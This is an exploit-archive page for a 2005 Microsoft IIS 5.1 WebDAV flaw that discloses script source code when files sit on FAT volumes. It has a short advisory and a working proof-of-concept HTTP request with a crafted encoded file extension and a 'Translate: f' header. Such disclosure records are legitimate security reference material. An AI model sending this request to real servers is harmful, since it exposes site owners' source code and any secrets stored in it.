[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure

Author: Inge Henriksen
type: remote
platform: windows
port: 
date_added: 2005-09-04 
date_updated: 2013-06-16 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/14764/info

Microsoft IIS is reportedly affected by a remote script source disclosure vulnerability.

A successful attack causes the Web server to present the requested file as a plain text file and subsequently disclosing the source.

It should be noted that this issue only presents itself when the requested files are stored on a FAT or FAT32 volume and does not arise if the script files are stored on a NTFS volume.

Microsoft IIS 5.1 is vulnerable to this issue.

GET /www/test.as%CF%80 HTTP/1.1
Translate: f
Host: www.example.com
Connection: Close
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.